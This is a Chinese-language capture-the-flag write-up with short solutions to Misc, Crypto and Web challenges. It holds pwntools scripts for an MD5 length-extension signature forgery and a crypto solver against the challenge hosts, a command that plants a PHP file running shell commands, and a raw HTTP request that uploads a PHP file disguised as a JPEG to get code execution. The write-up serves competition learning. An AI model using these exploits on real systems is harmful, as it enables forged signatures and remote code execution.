Misc
1.sqlshark
wireshark导出所有http包为json。然后写个脚本筛选即可。
Python
2.OnlyLocalSql
ssh连上。
Bash
cd /var/www/htmlcat << EOF >> flag.php<?php echo `ls /f*`;EOFcurl http://localhost:80即可。
也可以加个ssh -L 转发到本地但是没必要()
3.LearnOpenGL
感觉我的是非预期啊
shaders包中,去掉sprite和particle然后打开就能直接看到了()
4.ez_msb
249=>11111001。
数据在第二位放着。主要问题是msb。并不是很想用python写一个实现出来于是直接用了GNU Radio Companion

5.问卷调查
下次还填非常简单。
Crypto
1.SignAhead
md5长度扩展攻击。
hashpump编译不起然后找到了另外一个
Python
from pwn import *import HashToolscontext.log_level = 'info'P = remote("manqiu.top",20924)md5 = HashTools.MD5()for i in range(100): P.readline() msg = bytes.fromhex(P.readline().decode().split(":")[1].strip()) print("[*] msg:",msg) sign = P.readline().decode().split(":")[1].strip() print("[*] sign:",sign) md5 = HashTools.MD5() P.readline() nmsg , nsign = md5.extension(32,msg,b"233",signature=sign) print("[*] nmsg:",nmsg.hex()) print("[*] nsign:",nsign) P.sendlineafter(b": ",nmsg.hex().encode()) P.sendlineafter(b": ",nsign.encode()) print(P.readline())print(P.recvline())P.close()2.basiccry
传进去一个超递增/递减序列然后可以直接得到某一行的值。
Python
from pwn import *context.log_level = 'info'P = remote("manqiu.top",21175)r = "".join(str(i)+"," for i in [2**i for i in range(255,-1,-1)]).encode()r = r[:-1]P.sendlineafter(b":",r)cc = []for i in range(256): l = [] v = (P.recvline().decode().strip('\n')).strip().strip('[]').split(' ') for _ in v: if(_=='1' or _=='0'): l.append(int(_)) cc.append(l)l = []v = (P.recvline().decode().strip('\n')).strip('()').split(',')v = [int(i) for i in v]P.close()l = []r = 2**255d = v[0]r = 2**255ans = ""while r != 0: if d >= r: d -= r ans += "1" else: ans += "0" r //= 2cc = list(cc[0])for i in range(len(cc)): cc[i] -= int(ans[i]) cc[i] = cc[i] % 2for i in range(0,len(list(cc)),8): print(chr(int("".join(map(str,list(cc[i:i+8]))),2)),end="")Web
1.Checkin
直接F12然后在game.js中发现变量_0x3d9d。
2.TrySent
Text
POST /user/upload/upload HTTP/1.1Host: target.comCookie: PHPSESSID=7901b5229557c94bad46e16af23a3728Content-Length: 894Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThzAccept: */*Origin: https://info.ziwugu.vip/Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://target.com/user/upload/index?name=icon&type=image&limit=1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6Connection: close------WebKitFormBoundaryrhx2kYAMYDqoTThzContent-Disposition: form-data; name="id"WU_FILE_0------WebKitFormBoundaryrhx2kYAMYDqoTThzContent-Disposition: form-data; name="name"test.jpg------WebKitFormBoundaryrhx2kYAMYDqoTThzContent-Disposition: form-data; name="type"image/jpeg------WebKitFormBoundaryrhx2kYAMYDqoTThzContent-Disposition: form-data; name="lastModifiedDate"Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)------WebKitFormBoundaryrhx2kYAMYDqoTThzContent-Disposition: form-data; name="size"164264------WebKitFormBoundaryrhx2kYAMYDqoTThzContent-Disposition: form-data; name="file"; filename="test.php"Content-Type: image/jpegJFIF<?php RCE;?>------WebKitFormBoundaryrhx2kYAMYDqoTThz--